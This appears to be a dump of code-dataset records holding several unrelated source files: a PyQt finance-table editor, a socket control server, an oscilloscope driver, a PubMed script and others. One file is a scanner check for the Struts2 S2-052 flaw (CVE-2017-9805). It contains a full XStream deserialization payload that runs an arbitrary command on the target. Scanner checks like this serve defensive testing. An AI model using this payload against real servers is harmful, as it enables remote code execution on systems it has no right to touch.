self.tr("Has to be a date in format dd-mm-yyyy"))
error_mssg.exec_()
# Reset date to previous one
previous_date_timestamp = results.get_result_date_by_id(
database_entry_id)
previous_date_text = datetime.fromtimestamp(
previous_date_timestamp).strftime("%d-%m-%Y")
self.updatingdata_flag = True
new_item.setData(0, previous_date_text)
self.updatingdata_flag = False
# -------------- Account --------------------
elif columnselected_name == self.tr("Account"):
# The account has to be an existing one
all_accounts = [a[0] for a in balances.get_all_accounts()]
previous_account = results.get_result_account_by_id(
database_entry_id)
if new_item_data not in all_accounts:
error_mssg = QMessageBox()
error_mssg.setIcon(QMessageBox.Warning)
error_mssg.setText(
self.tr("The account has to be an existing one. \nAdd it first manually"))
error_mssg.exec_()
# Reset strategy to previous one
self.updatingdata_flag = True
new_item.setData(0, previous_account)
self.updatingdata_flag = False
else:
# The data is good
# Change the result on the results table on the db
results.update_result(
database_entry_id, new_account=new_item_data)
# Update the balance of the two accounts involved,
# according to the result amount
balances.update_balances_with_new_result(
previous_account, - previous_amount)
balances.update_balances_with_new_result(
new_item_data, previous_amount)
# -------------- Strategy --------------------
elif columnselected_name == self.tr("Strategy"):
# The strategy has to be an existing one
previous_strategy = results.get_result_strategy_by_id(
database_entry_id)
all_strategies = [s[0] for s in strategies.get_all_strategies()]
if new_item_data not in all_strategies:
error_mssg = QMessageBox()
error_mssg.setIcon(QMessageBox.Warning)
error_mssg.setText(
self.tr("The strategy has to be an existing one. \nAdd it first manually"))
error_mssg.exec_()
# Reset strategy to previous one
self.updatingdata_flag = True
new_item.setData(0, previous_strategy)
self.updatingdata_flag = False
else:
# The data is good
# Change the result on the results table of the db
results.updateResult(
database_entry_id, newstrategy=new_item_data)
# Update the pnl of the two strategies involved,
# according to the result amount
strategies.update_strategies_with_new_result(
previous_strategy, - previous_amount)
strategies.update_strategies_with_new_result(
new_item_data, previous_amount)
# -------------- Amount --------------------
elif columnselected_name == self.tr("Amount"):
# The amount has to be an integer
try:
new_item_data = int(new_item_data)
# Change the result on the results table of the db
results.update_result(
database_entry_id, new_amount=new_item_data)
# Update the balances and strategies with the difference
# between the old and the new result
diff_betweeen_results = new_item_data - previous_amount
account_involved = results.get_result_account_by_id(
database_entry_id)
strategy_involved = results.get_result_strategy_by_id(
database_entry_id)
balances.update_balances_with_new_result(
account_involved, diff_betweeen_results)
strategies.update_strategies_with_new_result(
strategy_involved, diff_betweeen_results)
except Exception:
error_mssg = QMessageBox()
error_mssg.setIcon(QMessageBox.Warning)
error_mssg.setText(
self.tr("Has to be an integer"))
error_mssg.exec_()
# Reset to previous amount
previous_amount = results.get_result_amount_by_id(
database_entry_id)
self.updatingdata_flag = True
new_item.setData(0, previous_amount)
self.updatingdata_flag = False
# -------------- Description --------------------
elif columnselected_name == self.tr("Description"):
# A description can be any data. So no checks
results.update_result(
database_entry_id, new_description=new_item_data)
class LineRemoved(QObject):
lineRemoved = pyqtSignal()
| en | 0.812611 | #!/usr/bin/python3 Decorator to flag self.updatingdata_flag whenever a function that edits data without user intervention is being run Table dynamically showing results # Custom Menu # A signal that will be emited whenever a line is removed # UI Tweaks # When edited, change the data on the database too # A flag to prevent changeCellOnDatabase execution when needed # Initialization: show all transactions Asks the database for results data within certain parameters, then shows that data on the table # Clear table # Get desired data from db # If the data is empty, we are done # Resize table # Change content # Item that will be inserted # Ids can't be editable # Change format to display date better # Data is now formatted, we can write it on table Custom Menu to show when an item is right-clicked Options: - Remove Line: removes line from table and database # Actions # Getting action selected by user # Act accordingly Removes the entire row of every selected item, and then does the same on the databse # Getting selected indexes, and their corresponding ids # from the database # Row number # Avoid duplicates # Removing the rows from the table and the database When a Table Item is edited by the user, we want to check if it fits the type and edit it on the database too # The data is being modified internally (not by the user) # so no errors assumed # Useful for balance adjustments later # Depending on from which column the item is, we check the data # proposed differently # Check which part of the transaction has been edited, and accting accordingly # -------------- id -------------------- # Ids can't be edited # -------------- Date -------------------- # The new text has to be a date # Reset date to previous one # -------------- Account -------------------- # The account has to be an existing one # Reset strategy to previous one # The data is good # Change the result on the results table on the db # Update the balance of the two accounts involved, # according to the result amount # -------------- Strategy -------------------- # The strategy has to be an existing one # Reset strategy to previous one # The data is good # Change the result on the results table of the db # Update the pnl of the two strategies involved, # according to the result amount # -------------- Amount -------------------- # The amount has to be an integer # Change the result on the results table of the db # Update the balances and strategies with the difference # between the old and the new result # Reset to previous amount # -------------- Description -------------------- # A description can be any data. So no checks | 2.283611 | 2 |
Day5/overlap_result.py | d4yvie/advent_of_code_2021 | 0 | 8510 | <filename>Day5/overlap_result.py<gh_stars>0
class OverlapResult:
def __init__(self, overlap_map: dict[tuple[float, float], int]):
self._overlap_map = overlap_map
self._overlaps = overlap_map_to_overlaps(overlap_map)
@property
def overlaps(self) -> int:
return self._overlaps
@property
def overlap_map(self) -> dict[tuple[float, float], int]:
return self._overlap_map
def overlap_map_to_overlaps(overlap_map: dict[tuple[float, float], int], minimal_overlap=2) -> int:
return len(list(filter(lambda val: val >= minimal_overlap, overlap_map.values())))
| <filename>Day5/overlap_result.py<gh_stars>0
class OverlapResult:
def __init__(self, overlap_map: dict[tuple[float, float], int]):
self._overlap_map = overlap_map
self._overlaps = overlap_map_to_overlaps(overlap_map)
@property
def overlaps(self) -> int:
return self._overlaps
@property
def overlap_map(self) -> dict[tuple[float, float], int]:
return self._overlap_map
def overlap_map_to_overlaps(overlap_map: dict[tuple[float, float], int], minimal_overlap=2) -> int:
return len(list(filter(lambda val: val >= minimal_overlap, overlap_map.values())))
| none | 1 | 2.863151 | 3 |
|
setup.py | NikolaiT/proxychecker | 1 | 8511 | <filename>setup.py
#!/usr/bin/env python
from distutils.core import setup
VERSION = "0.0.1"
setup(
author='<NAME>',
name = "proxychecker",
version = VERSION,
description = "A Python proxychecker module that makes use of socks",
url = "http://incolumitas.com",
license = "BSD",
author_email = "<EMAIL>",
keywords = ["socks", "proxy", "proxychecker"],
py_modules = ['proxychecker', 'sockshandler', 'socks']
)
| <filename>setup.py
#!/usr/bin/env python
from distutils.core import setup
VERSION = "0.0.1"
setup(
author='<NAME>',
name = "proxychecker",
version = VERSION,
description = "A Python proxychecker module that makes use of socks",
url = "http://incolumitas.com",
license = "BSD",
author_email = "<EMAIL>",
keywords = ["socks", "proxy", "proxychecker"],
py_modules = ['proxychecker', 'sockshandler', 'socks']
)
| ru | 0.26433 | #!/usr/bin/env python | 1.237086 | 1 |
charlotte/charlotte.py | puiterwijk/charlotte | 5 | 8512 | <filename>charlotte/charlotte.py
class Config:
def __init__(self, config_file_name):
self.config_file_name = config_file_name
| <filename>charlotte/charlotte.py
class Config:
def __init__(self, config_file_name):
self.config_file_name = config_file_name
| none | 1 | 1.768943 | 2 |
|
python/app/plugins/http/Struts2/S2_052.py | taomujian/linbing | 351 | 8513 | #!/usr/bin/env python3
from app.lib.utils.request import request
from app.lib.utils.encode import base64encode
from app.lib.utils.common import get_capta, get_useragent
class S2_052_BaseVerify:
def __init__(self, url):
self.info = {
'name': 'S2-052漏洞,又名CVE-2017-9805漏洞',
'description': 'Struts2 Remote Code Execution Vulnerability, Struts 2.1.6 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12',
'date': '2017-09-05',
'exptype': 'check',
'type': 'RCE'
}
self.url = url
if not self.url.startswith("http") and not self.url.startswith("https"):
self.url = "http://" + self.url
self.capta = get_capta()
self.headers = {
'User-Agent': get_useragent(),
'Content-Type': "application/xml",
}
self.payload ='''
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
{cmd}
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
'''
def check(self):
"""
检测是否存在漏洞
:param:
:return bool True or False: 是否存在漏洞
"""
try:
self.check_payload = self.payload.format(cmd = '<string>calc</string>')
check_req = request.post(self.url, headers = self.headers, data = self.check_payload)
if check_req.status_code == 500 and 'java.security.Provider$Service' in check_req.text:
return True
else:
return False
except Exception as e:
print(e)
return False
finally:
pass
if __name__ == "__main__":
S2_052 = S2_052_BaseVerify('http://127.0.0.1:8088/struts2_rest_showcase_war_exploded/orders/3') | #!/usr/bin/env python3
from app.lib.utils.request import request
from app.lib.utils.encode import base64encode
from app.lib.utils.common import get_capta, get_useragent
class S2_052_BaseVerify:
def __init__(self, url):
self.info = {
'name': 'S2-052漏洞,又名CVE-2017-9805漏洞',
'description': 'Struts2 Remote Code Execution Vulnerability, Struts 2.1.6 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12',
'date': '2017-09-05',
'exptype': 'check',
'type': 'RCE'
}
self.url = url
if not self.url.startswith("http") and not self.url.startswith("https"):
self.url = "http://" + self.url
self.capta = get_capta()
self.headers = {
'User-Agent': get_useragent(),
'Content-Type': "application/xml",
}
self.payload ='''
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
{cmd}
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
'''
def check(self):
"""
检测是否存在漏洞
:param:
:return bool True or False: 是否存在漏洞
"""
try:
self.check_payload = self.payload.format(cmd = '<string>calc</string>')
check_req = request.post(self.url, headers = self.headers, data = self.check_payload)
if check_req.status_code == 500 and 'java.security.Provider$Service' in check_req.text:
return True
else:
return False
except Exception as e:
print(e)
return False
finally:
pass
if __name__ == "__main__":
S2_052 = S2_052_BaseVerify('http://127.0.0.1:8088/struts2_rest_showcase_war_exploded/orders/3') | en | 0.190416 | #!/usr/bin/env python3 <map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> {cmd} </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> </entry> </map> 检测是否存在漏洞 :param: :return bool True or False: 是否存在漏洞 | 2.387362 | 2 |
UPD/extension/utils.py | RIDCorix/UPD | 0 | 8514 | <reponame>RIDCorix/UPD<gh_stars>0
import sys
# def get_tools():
# manager = PluginManager()
# manager.setPluginPlaces(["plugins/file_cabinet"])
# manager.collectPlugins()
# return [plugin.plugin_object for plugin in manager.getAllPlugins()]
def get_tools():
import importlib
tools = ['file_cabinet', 'us', 'automator', 'main']
tool_installation_dir1 = 'C:/Users/User/UPD/plugins'
tool_installation_dir2 = '/Users/mac/UPD/plugins'
sys.path.append(tool_installation_dir1)
sys.path.append(tool_installation_dir2)
tool_instances = []
auto_load_modules = ['tasks', 'ui', 'models', 'renderers']
for tool in tools:
tool_instances.append(importlib.import_module('.'.join([tool, 'tool'])).tool)
for module in auto_load_modules:
try:
importlib.import_module('.'.join([tool, module]))
except:
pass
return tool_instances
| import sys
# def get_tools():
# manager = PluginManager()
# manager.setPluginPlaces(["plugins/file_cabinet"])
# manager.collectPlugins()
# return [plugin.plugin_object for plugin in manager.getAllPlugins()]
def get_tools():
import importlib
tools = ['file_cabinet', 'us', 'automator', 'main']
tool_installation_dir1 = 'C:/Users/User/UPD/plugins'
tool_installation_dir2 = '/Users/mac/UPD/plugins'
sys.path.append(tool_installation_dir1)
sys.path.append(tool_installation_dir2)
tool_instances = []
auto_load_modules = ['tasks', 'ui', 'models', 'renderers']
for tool in tools:
tool_instances.append(importlib.import_module('.'.join([tool, 'tool'])).tool)
for module in auto_load_modules:
try:
importlib.import_module('.'.join([tool, module]))
except:
pass
return tool_instances | en | 0.339047 | # def get_tools(): # manager = PluginManager() # manager.setPluginPlaces(["plugins/file_cabinet"]) # manager.collectPlugins() # return [plugin.plugin_object for plugin in manager.getAllPlugins()] | 2.255539 | 2 |
sbin/preload_findit_coverage_2.py | cariaso/metapub | 28 | 8515 | <filename>sbin/preload_findit_coverage_2.py
from __future__ import absolute_import, print_function, unicode_literals
# "preload" for FindIt #2: iterate over same journal list, but actually
# load a PubMedArticle object on each PMID. (no list output created)
from metapub import FindIt, PubMedFetcher
from metapub.findit.dances import the_doi_2step
from config import JOURNAL_ISOABBR_LIST_FILENAME
fetch = PubMedFetcher()
def get_sample_pmids_for_journal(jrnl, years=None, max_pmids=3):
samples = []
if years is None:
pmids = fetch.pmids_for_query(journal=jrnl)
idx = 0
while idx < len(pmids) and idx < max_pmids:
samples.append(pmids[idx])
idx += 1
else:
for year in years:
pmids = fetch.pmids_for_query(journal=jrnl, year=year)
if len(pmids) < 1:
continue
samples.append(pmids[0])
return samples
def main():
jrnls = sorted(open(JOURNAL_ISOABBR_LIST_FILENAME).read().split('\n'))
for jrnl in jrnls:
jrnl = jrnl.strip()
if jrnl == '':
continue
years = ['1975', '1980', '1990', '2002', '2013']
num_desired = len(years)
pmids = get_sample_pmids_for_journal(jrnl, years=years)
if len(pmids) < num_desired:
pmids = pmids + get_sample_pmids_for_journal(jrnl, max_pmids=num_desired-len(pmids))
print('[%s] Sample pmids: %r' % (jrnl, pmids))
for pmid in pmids:
pma = fetch.article_by_pmid(pmid)
print(' ', pma.pmid, pma.title)
if __name__ == '__main__':
main()
| <filename>sbin/preload_findit_coverage_2.py
from __future__ import absolute_import, print_function, unicode_literals
# "preload" for FindIt #2: iterate over same journal list, but actually
# load a PubMedArticle object on each PMID. (no list output created)
from metapub import FindIt, PubMedFetcher
from metapub.findit.dances import the_doi_2step
from config import JOURNAL_ISOABBR_LIST_FILENAME
fetch = PubMedFetcher()
def get_sample_pmids_for_journal(jrnl, years=None, max_pmids=3):
samples = []
if years is None:
pmids = fetch.pmids_for_query(journal=jrnl)
idx = 0
while idx < len(pmids) and idx < max_pmids:
samples.append(pmids[idx])
idx += 1
else:
for year in years:
pmids = fetch.pmids_for_query(journal=jrnl, year=year)
if len(pmids) < 1:
continue
samples.append(pmids[0])
return samples
def main():
jrnls = sorted(open(JOURNAL_ISOABBR_LIST_FILENAME).read().split('\n'))
for jrnl in jrnls:
jrnl = jrnl.strip()
if jrnl == '':
continue
years = ['1975', '1980', '1990', '2002', '2013']
num_desired = len(years)
pmids = get_sample_pmids_for_journal(jrnl, years=years)
if len(pmids) < num_desired:
pmids = pmids + get_sample_pmids_for_journal(jrnl, max_pmids=num_desired-len(pmids))
print('[%s] Sample pmids: %r' % (jrnl, pmids))
for pmid in pmids:
pma = fetch.article_by_pmid(pmid)
print(' ', pma.pmid, pma.title)
if __name__ == '__main__':
main()
| en | 0.614009 | # "preload" for FindIt #2: iterate over same journal list, but actually # load a PubMedArticle object on each PMID. (no list output created) | 2.566462 | 3 |
sgcache/control.py | vfxetc/sgcache | 13 | 8516 | <gh_stars>10-100
from __future__ import absolute_import
from select import select
import errno
import functools
import itertools
import json
import logging
import os
import socket
import threading
import time
import traceback
log = logging.getLogger(__name__)
from .utils import makedirs, unlink
class TimeOut(Exception):
pass
base_handlers = {
'ping': lambda control, msg: {'type': 'pong', 'pid': os.getpid()}
}
def _coerce_msg(type=None, **msg):
if type:
if isinstance(type, basestring):
msg['type'] = type
return msg
elif msg:
raise ValueError('cannot specify dict message and kwargs')
else:
msg = dict(type)
if 'type' not in msg:
raise ValueError('message requires type')
return msg
class ControlClient(object):
handlers = base_handlers.copy()
def __init__(self, addr=None, sock=None, server=None):
self.addr = addr
self.sock = sock
self.server = server
self._line_buffer = ''
self._message_buffer = []
self._handler_reply_ids = None
self._session_generator = itertools.count(1)
if sock is None:
self.connect()
def connect(self):
# This is indempodent.
if self.sock is not None:
return
if self.addr is None:
return
if isinstance(self.addr, basestring):
self.sock = socket.socket(socket.AF_UNIX)
else:
self.sock = socket.socket(socket.AF_INET)
self.sock.connect(self.addr)
return True
def close(self):
if self.sock:
self.sock.close()
self.sock = None
def _readline(self, timeout=None):
if not self.sock:
return
if timeout:
end_time = time.time() + timeout
buffer_ = self._line_buffer
while True:
r, _, _ = select([self.sock], [], [], max(0, end_time - time.time()) if timeout else None)
if not r:
raise TimeOut()
new = self.sock.recv(4096)
if not new:
self.sock = None
self._line_buffer = ''
return
buffer_ += new
if '\n' in buffer_:
line, buffer_ = buffer_.split('\n', 1)
self._line_buffer = buffer_
return line
def recv(self, timeout=None):
try:
return self._message_buffer.pop(0)
except IndexError:
pass
for attempt_num in (0, 1):
self.connect()
try:
line = self._readline(timeout)
except socket.error as e:
if attempt_num:
raise
if line:
try:
return json.loads(line)
except:
self.send('error', message='malformed message')
self.close()
return
if attempt_num:
return
def recv_for(self, wait_id, timeout=None):
for i in xrange(len(self._message_buffer)):
msg = self._message_buffer[i]
if msg.get('for') == wait_id:
self._message_buffer.pop(i)
return msg
while True:
msg = self.recv(timeout)
if not msg:
return
if msg.get('for') == wait_id:
return msg
self._message_buffer.append(msg)
def send(self, *args, **kwargs):
msg = _coerce_msg(*args, **kwargs)
wait_id = msg.get('wait')
if wait_id is True:
wait_id = msg['wait'] = next(self._session_generator)
encoded = json.dumps(msg)
# Track what has been sent automatically.
if wait_id is not None and self._handler_reply_ids is not None:
self._handler_reply_ids.add(wait_id)
# Attempt to reconnect a couple times when sending this.
for attempt_num in (0, 1):
self.connect()
try:
self.sock.send(encoded + '\n')
except socket.error as e:
if attempt_num:
raise
return wait_id
def reply_to(self, original, *args, **kwargs):
wait_id = original.get('wait')
if wait_id is None:
raise ValueError('original message has no session')
msg = _coerce_msg(*args, **kwargs)
msg['for'] = wait_id
self.send(msg)
def send_and_recv(self, type, **kwargs):
timeout = kwargs.pop('timeout')
msg = _coerce_msg(type, **kwargs)
msg['wait'] = True
wait_id = self.send(msg)
return self.recv_for(wait_id, timeout)
def ping(self, timeout=None):
return self.send_and_recv('ping', pid=os.getpid(), timeout=timeout)
def loop(self, async=False):
if async:
thread = threading.Thread(target=self.loop)
thread.daemon = True
thread.start()
return thread
while True:
msg = self.recv()
if not msg:
return
type_ = msg.get('type')
wait_id = msg.get('wait')
func = self.handlers.get(type_)
if func is None and self.server:
func = self.server.handlers.get(type_)
if func is None:
log.warning('unknown message type %r' % type_)
self.reply_to(msg, 'error', message='unknown message type %r' % type_)
continue
if self.server and self.server.name:
log.info('%s handling %s' % (self.server.name, type_))
else:
log.info('handling %s' % type_)
self._handler_reply_ids = set()
try:
res = func(self, msg)
except Exception as e:
self.reply_to(msg, 'error', message='unhandled exception %s' % e)
continue
# If the handler replied, then we are done.
if res is None and wait_id is None or wait_id in self._handler_reply_ids:
continue
res = res.copy() if isinstance(res, dict) and 'type' in res else {'type': 'result', 'value': res}
if wait_id is not None:
res['for'] = wait_id
self.send(res)
class ControlServer(object):
def __init__(self, addr, name=None):
self.addr = addr
self.name = name
self.handlers = base_handlers.copy()
if isinstance(self.addr, basestring):
self.sock = socket.socket(socket.AF_UNIX)
if os.path.exists(self.addr):
# TODO: Try connecting to it before destroying it.
unlink(self.addr)
makedirs(os.path.dirname(self.addr))
else:
self.sock = socket.socket(socket.AF_INET)
self.sock.bind(self.addr)
self.sock.listen(5)
def register(self, func=None, **kwargs):
if func is None:
return functools(self.register(**kwargs))
self.handlers[kwargs.get('name') or func.__name__] = func
def loop(self, async=False):
if async:
thread = threading.Thread(target=self.loop)
thread.daemon = True
thread.start()
return thread
while True:
try:
client_sock, addr = self.sock.accept()
except socket.timeout:
continue
client = ControlClient(sock=client_sock, server=self)
client.loop(async=True)
| from __future__ import absolute_import
from select import select
import errno
import functools
import itertools
import json
import logging
import os
import socket
import threading
import time
import traceback
log = logging.getLogger(__name__)
from .utils import makedirs, unlink
class TimeOut(Exception):
pass
base_handlers = {
'ping': lambda control, msg: {'type': 'pong', 'pid': os.getpid()}
}
def _coerce_msg(type=None, **msg):
if type:
if isinstance(type, basestring):
msg['type'] = type
return msg
elif msg:
raise ValueError('cannot specify dict message and kwargs')
else:
msg = dict(type)
if 'type' not in msg:
raise ValueError('message requires type')
return msg
class ControlClient(object):
handlers = base_handlers.copy()
def __init__(self, addr=None, sock=None, server=None):
self.addr = addr
self.sock = sock
self.server = server
self._line_buffer = ''
self._message_buffer = []
self._handler_reply_ids = None
self._session_generator = itertools.count(1)
if sock is None:
self.connect()
def connect(self):
# This is indempodent.
if self.sock is not None:
return
if self.addr is None:
return
if isinstance(self.addr, basestring):
self.sock = socket.socket(socket.AF_UNIX)
else:
self.sock = socket.socket(socket.AF_INET)
self.sock.connect(self.addr)
return True
def close(self):
if self.sock:
self.sock.close()
self.sock = None
def _readline(self, timeout=None):
if not self.sock:
return
if timeout:
end_time = time.time() + timeout
buffer_ = self._line_buffer
while True:
r, _, _ = select([self.sock], [], [], max(0, end_time - time.time()) if timeout else None)
if not r:
raise TimeOut()
new = self.sock.recv(4096)
if not new:
self.sock = None
self._line_buffer = ''
return
buffer_ += new
if '\n' in buffer_:
line, buffer_ = buffer_.split('\n', 1)
self._line_buffer = buffer_
return line
def recv(self, timeout=None):
try:
return self._message_buffer.pop(0)
except IndexError:
pass
for attempt_num in (0, 1):
self.connect()
try:
line = self._readline(timeout)
except socket.error as e:
if attempt_num:
raise
if line:
try:
return json.loads(line)
except:
self.send('error', message='malformed message')
self.close()
return
if attempt_num:
return
def recv_for(self, wait_id, timeout=None):
for i in xrange(len(self._message_buffer)):
msg = self._message_buffer[i]
if msg.get('for') == wait_id:
self._message_buffer.pop(i)
return msg
while True:
msg = self.recv(timeout)
if not msg:
return
if msg.get('for') == wait_id:
return msg
self._message_buffer.append(msg)
def send(self, *args, **kwargs):
msg = _coerce_msg(*args, **kwargs)
wait_id = msg.get('wait')
if wait_id is True:
wait_id = msg['wait'] = next(self._session_generator)
encoded = json.dumps(msg)
# Track what has been sent automatically.
if wait_id is not None and self._handler_reply_ids is not None:
self._handler_reply_ids.add(wait_id)
# Attempt to reconnect a couple times when sending this.
for attempt_num in (0, 1):
self.connect()
try:
self.sock.send(encoded + '\n')
except socket.error as e:
if attempt_num:
raise
return wait_id
def reply_to(self, original, *args, **kwargs):
wait_id = original.get('wait')
if wait_id is None:
raise ValueError('original message has no session')
msg = _coerce_msg(*args, **kwargs)
msg['for'] = wait_id
self.send(msg)
def send_and_recv(self, type, **kwargs):
timeout = kwargs.pop('timeout')
msg = _coerce_msg(type, **kwargs)
msg['wait'] = True
wait_id = self.send(msg)
return self.recv_for(wait_id, timeout)
def ping(self, timeout=None):
return self.send_and_recv('ping', pid=os.getpid(), timeout=timeout)
def loop(self, async=False):
if async:
thread = threading.Thread(target=self.loop)
thread.daemon = True
thread.start()
return thread
while True:
msg = self.recv()
if not msg:
return
type_ = msg.get('type')
wait_id = msg.get('wait')
func = self.handlers.get(type_)
if func is None and self.server:
func = self.server.handlers.get(type_)
if func is None:
log.warning('unknown message type %r' % type_)
self.reply_to(msg, 'error', message='unknown message type %r' % type_)
continue
if self.server and self.server.name:
log.info('%s handling %s' % (self.server.name, type_))
else:
log.info('handling %s' % type_)
self._handler_reply_ids = set()
try:
res = func(self, msg)
except Exception as e:
self.reply_to(msg, 'error', message='unhandled exception %s' % e)
continue
# If the handler replied, then we are done.
if res is None and wait_id is None or wait_id in self._handler_reply_ids:
continue
res = res.copy() if isinstance(res, dict) and 'type' in res else {'type': 'result', 'value': res}
if wait_id is not None:
res['for'] = wait_id
self.send(res)
class ControlServer(object):
def __init__(self, addr, name=None):
self.addr = addr
self.name = name
self.handlers = base_handlers.copy()
if isinstance(self.addr, basestring):
self.sock = socket.socket(socket.AF_UNIX)
if os.path.exists(self.addr):
# TODO: Try connecting to it before destroying it.
unlink(self.addr)
makedirs(os.path.dirname(self.addr))
else:
self.sock = socket.socket(socket.AF_INET)
self.sock.bind(self.addr)
self.sock.listen(5)
def register(self, func=None, **kwargs):
if func is None:
return functools(self.register(**kwargs))
self.handlers[kwargs.get('name') or func.__name__] = func
def loop(self, async=False):
if async:
thread = threading.Thread(target=self.loop)
thread.daemon = True
thread.start()
return thread
while True:
try:
client_sock, addr = self.sock.accept()
except socket.timeout:
continue
client = ControlClient(sock=client_sock, server=self)
client.loop(async=True) | en | 0.941029 | # This is indempodent. # Track what has been sent automatically. # Attempt to reconnect a couple times when sending this. # If the handler replied, then we are done. # TODO: Try connecting to it before destroying it. | 2.278804 | 2 |
lantz/drivers/tektronix/tds1002b.py | mtsolmn/lantz-drivers | 4 | 8517 | <reponame>mtsolmn/lantz-drivers
# -*- coding: utf-8 -*-
"""
lantz.drivers.tektronix.tds1012
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Implements the drivers to control an oscilloscope.
:copyright: 2015 by Lantz Authors, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from lantz.core import Feat, MessageBasedDriver
class TDS1002b(MessageBasedDriver):
MANUFACTURER_ID = '0x699'
MODEL_CODE = '0x363'
@Feat(read_once=True)
def idn(self):
return self.query('*IDN?')
| # -*- coding: utf-8 -*-
"""
lantz.drivers.tektronix.tds1012
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Implements the drivers to control an oscilloscope.
:copyright: 2015 by Lantz Authors, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from lantz.core import Feat, MessageBasedDriver
class TDS1002b(MessageBasedDriver):
MANUFACTURER_ID = '0x699'
MODEL_CODE = '0x363'
@Feat(read_once=True)
def idn(self):
return self.query('*IDN?') | en | 0.660387 | # -*- coding: utf-8 -*- lantz.drivers.tektronix.tds1012 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Implements the drivers to control an oscilloscope. :copyright: 2015 by Lantz Authors, see AUTHORS for more details. :license: BSD, see LICENSE for more details. | 1.875044 | 2 |
specs/dxgi.py | linkmauve/apitrace | 1 | 8518 | ##########################################################################
#
# Copyright 2014 VMware, Inc
# Copyright 2011 <NAME>
# All Rights Reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
